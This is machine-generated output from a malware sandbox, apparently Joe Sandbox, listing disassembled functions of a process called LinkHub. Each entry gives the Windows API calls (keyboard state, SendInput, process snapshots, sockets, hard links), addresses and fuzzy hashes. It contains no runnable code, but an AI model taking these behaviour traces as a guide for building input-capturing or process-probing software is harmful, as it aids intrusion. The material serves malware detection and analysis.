                                                                    • Opcode Fuzzy Hash: a721cb9c0df018626a422d1194a9d05e90dcd7a1378fdf478dfd24705008be1d
                                                                    • Instruction Fuzzy Hash: 60217CB5600609AFEB10DF64DC81EBB37ADEB5A364B440159F9049B3A1CA70EC11DEB1
                                                                    Function 00D04253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00D042DC
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00D042EC
                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00D04312
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: a763ee8807e463680d73884dcd3a2bc9c3774e708c2d26fd5759da99230d5099
                                                                    • Instruction ID: 0f18bf6d316c1115c6f84e3bbf43d9c16cd2ab21fc20e61a39bb739f93abadf0
                                                                    • Opcode Fuzzy Hash: a763ee8807e463680d73884dcd3a2bc9c3774e708c2d26fd5759da99230d5099
                                                                    • Instruction Fuzzy Hash: 2C218072610218BBEB118FA4CC85FAF3B6EEF89764F158115FA09AB1D0C6719C5197B0
                                                                    Function 00CE5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00CE544D
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00CE54A1
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00D0DCD0), ref: 00CE5515
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume
                                                                    • String ID: %lu
                                                                    • API String ID: 2507767853-685833217
                                                                    • Opcode ID: 6caffd4b512e566a376cc1ddbdc6796da0f5af0669cfa2c2fdf6b6445a8f7e2b
                                                                    • Instruction ID: 64a7253c1bd3da4243c1b74fbd9b9dc3b5120e4b52231e6eb0081cf073a813a7
                                                                    • Opcode Fuzzy Hash: 6caffd4b512e566a376cc1ddbdc6796da0f5af0669cfa2c2fdf6b6445a8f7e2b
                                                                    • Instruction Fuzzy Hash: A0315374A00209AFD711DF54C985EAA77F9EF08308F1480A9F509DB362DB71EE45DB61
                                                                    Function 00D04C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00D04CED
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00D04D02
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00D04D0F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: f40dfa7e49c748852df6a384f30628edafc49c277dd4d878f7aad66c4e3f7f67
                                                                    • Instruction ID: 2467a8053bc1b44e53744c3d24e63f2e34c3d8096e30627c4cae6b1879b8f86d
                                                                    • Opcode Fuzzy Hash: f40dfa7e49c748852df6a384f30628edafc49c277dd4d878f7aad66c4e3f7f67
                                                                    • Instruction Fuzzy Hash: 7711E0B1240248BEEF205E69CC06FAB3BA8EF85B64F110519FA59E21E0C671DC50DB70
                                                                    Function 00CD389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                      • Part of subcall function 00CD36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00CD3712
                                                                      • Part of subcall function 00CD36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD3723
                                                                      • Part of subcall function 00CD36F4: GetCurrentThreadId.KERNEL32 ref: 00CD372A
                                                                      • Part of subcall function 00CD36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00CD3731
                                                                    • GetFocus.USER32 ref: 00CD38C4
                                                                      • Part of subcall function 00CD373B: GetParent.USER32(00000000), ref: 00CD3746
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00CD390F
                                                                    • EnumChildWindows.USER32(?,00CD3987), ref: 00CD3937
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                    • String ID: %s%d
                                                                    • API String ID: 1272988791-1110647743
                                                                    • Opcode ID: 26bbb726cdfe4c6a9ef89b287899b56eb3650f92b01b831b39a498204d780a8f
                                                                    • Instruction ID: 52aaafd79b425ef6c24bd926427437b36dd88f923b97d71b385a01fb23929b67
                                                                    • Opcode Fuzzy Hash: 26bbb726cdfe4c6a9ef89b287899b56eb3650f92b01b831b39a498204d780a8f
                                                                    • Instruction Fuzzy Hash: 4211EBB16002496BDF01BF749C85AED77AAAF94304F048076BE0D9B392CE719909DB31
                                                                    Function 00D06321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00D06360
                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00D0638D
                                                                    • DrawMenuBar.USER32(?), ref: 00D0639C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$InfoItem$Draw
                                                                    • String ID: 0
                                                                    • API String ID: 3227129158-4108050209
                                                                    • Opcode ID: 7d3d620d3721bc70b0b17df1e20f9c644aaa14144721ff06fd07a666d3cad17e
                                                                    • Instruction ID: 0c0830c15d7bd05960524c06be731d1df350a3b373a73dc41a55ded45c9ffe1f
                                                                    • Opcode Fuzzy Hash: 7d3d620d3721bc70b0b17df1e20f9c644aaa14144721ff06fd07a666d3cad17e
                                                                    • Instruction Fuzzy Hash: BF013931500218AFDB219F51DC88BAEBBB5FF45351F18809AE849D6190DB308A95EF71
                                                                    Function 00CD096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 044334f05148094b770f7a75df5f9539767e674478b6ae4378e71db193283e21
                                                                    • Instruction ID: c0d42a96c0d0d4613bb0b0905ac6bfb05fb869ea7f0359781660c7bc6130ae9d
                                                                    • Opcode Fuzzy Hash: 044334f05148094b770f7a75df5f9539767e674478b6ae4378e71db193283e21
                                                                    • Instruction Fuzzy Hash: AAC13B75A00206AFDB14CF98C894BAEB7B5FF88704F20859AE615DB351D731EE81DB90
                                                                    Function 00CA41F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: __alldvrm$_strrchr
                                                                    • String ID:
                                                                    • API String ID: 1036877536-0
                                                                    • Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                                                    • Instruction ID: b36e712fd2c3749e192a6257da97393e9daaa44ee955bb84a5225de4e6521f9e
                                                                    • Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                                                    • Instruction Fuzzy Hash: F1A1AC729007879FDB29CF18C8917AEBBE4EF97318F14416DE5A59B241C3B48E41C750
                                                                    Function 00CD0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00D10BD4,?), ref: 00CD0EE0
                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00D10BD4,?), ref: 00CD0EF8
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00D0DCE0,000000FF,?,00000000,00000800,00000000,?,00D10BD4,?), ref: 00CD0F1D
                                                                    • _memcmp.LIBVCRUNTIME ref: 00CD0F3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                    • String ID:
                                                                    • API String ID: 314563124-0
                                                                    • Opcode ID: 9b3c2bce399ccd1e8de74b87d433acf0af3f5358dcf265dd7d6c41205a528344
                                                                    • Instruction ID: 1df5434dd51fe086f885a0e510a02891885ab9d95e42507382d9da11a3c4488d
                                                                    • Opcode Fuzzy Hash: 9b3c2bce399ccd1e8de74b87d433acf0af3f5358dcf265dd7d6c41205a528344
                                                                    • Instruction Fuzzy Hash: 8C811971A00109EFCB04DFD8C988EEEB7B9FF89315F204559E516AB250DB71AE46CB60
                                                                    Function 00CFB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00CFB10C
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00CFB11A
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00CFB1FC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFB20B
                                                                      • Part of subcall function 00C8E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00CB4D73,?), ref: 00C8E395
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                    • String ID:
                                                                    • API String ID: 1991900642-0
                                                                    • Opcode ID: cc1dfb39922fce9e4230ac298ef15306589d40aeb9020b8cbb2907c77464b433
                                                                    • Instruction ID: 18dd2d434f3cedf733340336ef7e30d608f89421acb99aca04d55ecd3a156bf2
                                                                    • Opcode Fuzzy Hash: cc1dfb39922fce9e4230ac298ef15306589d40aeb9020b8cbb2907c77464b433
                                                                    • Instruction Fuzzy Hash: 50514BB1508304AFD350EF24C886A6BBBE8FF88754F40891DF59997251EB70ED04DB92
                                                                    Function 00CB1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 0e2c764ff8b15e2f45f1b2219dea4a53e7f6fafa7047418129e12f160dae04ee
                                                                    • Instruction ID: 07f8afb3a50a8e823a47c258d4d541d341ff7cc4de0ad166ef62e963c8aa0590
                                                                    • Opcode Fuzzy Hash: 0e2c764ff8b15e2f45f1b2219dea4a53e7f6fafa7047418129e12f160dae04ee
                                                                    • Instruction Fuzzy Hash: 48413E31900211ABDB207BBE9C56AFE3BA4FF46370F5D0125FC28E71D1DB754A416261
                                                                    Function 00CF2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00CF255A
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF2568
                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00CF25E7
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF25F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$socket
                                                                    • String ID:
                                                                    • API String ID: 1881357543-0
                                                                    • Opcode ID: ec3bb9e3c7b3628f9d8f7db291e182dda167409d9975a45a9ef4eff58165ca8c
                                                                    • Instruction ID: 455006d8e58ecf23f2f22061ac15eebb78da6af7b742dff83acc27dbc31fd71a
                                                                    • Opcode Fuzzy Hash: ec3bb9e3c7b3628f9d8f7db291e182dda167409d9975a45a9ef4eff58165ca8c
                                                                    • Instruction Fuzzy Hash: CA41D475A40204AFE720AF24C886F2677E5AB48758F54C498FA1A8F3D2C771ED42DB91
                                                                    Function 00D06CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00D06D1A
                                                                    • ScreenToClient.USER32(?,?), ref: 00D06D4D
                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00D06DBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: c74d883058c8ed85479377dc9eb6b91625747a712c1cbe5e45cd56f3a87aaba3
                                                                    • Instruction ID: 6dd44e2631b174780b23d2645a72b46635819d5e8467a96b2ae352c91047960c
                                                                    • Opcode Fuzzy Hash: c74d883058c8ed85479377dc9eb6b91625747a712c1cbe5e45cd56f3a87aaba3
                                                                    • Instruction Fuzzy Hash: 38511B75A00209EFCF24DF64D880AAE7BB6FF45720F248159F9599B290D730ED91CB60
                                                                    Function 00CAB79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db66e12045fef48ed33110406db4ddcc563036086a28706a10c825786304e8c8
                                                                    • Instruction ID: 37ff7ad3c5b9e1b129ddf1649e73d0ee7a43477ff04f06817c306d70b836652a
                                                                    • Opcode Fuzzy Hash: db66e12045fef48ed33110406db4ddcc563036086a28706a10c825786304e8c8
                                                                    • Instruction Fuzzy Hash: 5C412571A00705AFD724AF7CDC41BAABBACEB89714F10852AF015DB2C2D7759E019B90
                                                                    Function 00CE611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CE61C8
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00CE61EE
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CE6213
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CE623F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: e6679cf1551694e5bbe64be73f8afcdbe6f3ec7c257cc56870cda88e3ce3212e
                                                                    • Instruction ID: 0b3c50e4afdfdea151ebbad8c59859d5466e92feb704b97c68af636107b6c566
                                                                    • Opcode Fuzzy Hash: e6679cf1551694e5bbe64be73f8afcdbe6f3ec7c257cc56870cda88e3ce3212e
                                                                    • Instruction Fuzzy Hash: B7414939600611DFCB11EF65C585A1EBBE2FF99710B18C488E95AAB362CB30FD05DB91
                                                                    Function 00CADC43 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00C970E1,00000000,00000000,00C98649,?,00C98649,?,00000001,00C970E1,8BE85006,00000001,00C98649,00C98649), ref: 00CADC90
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CADD19
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00CADD2B
                                                                    • __freea.LIBCMT ref: 00CADD34
                                                                      • Part of subcall function 00CA3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C90165,?,?,00CE11D9,0000FFFF), ref: 00CA3BC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                    • String ID:
                                                                    • API String ID: 2652629310-0
                                                                    • Opcode ID: 8e8899d26ffe21162243123d41bfd700b635120eeb6f3417767cc0afb00851ef
                                                                    • Instruction ID: e3c200f0fc50d7d899dc0bcded398d5d54ab55597ca7bfb687dbd7d5db64b0b3
                                                                    • Opcode Fuzzy Hash: 8e8899d26ffe21162243123d41bfd700b635120eeb6f3417767cc0afb00851ef
                                                                    • Instruction Fuzzy Hash: A731C172A0020AABDF248F64DC45EEE7BA6EF41718F154129FC16D7250EB35CE51DBA0
                                                                    Function 00CDB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00CDB473
                                                                    • SetKeyboardState.USER32(00000080), ref: 00CDB48F
                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00CDB4FD
                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00CDB54F
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
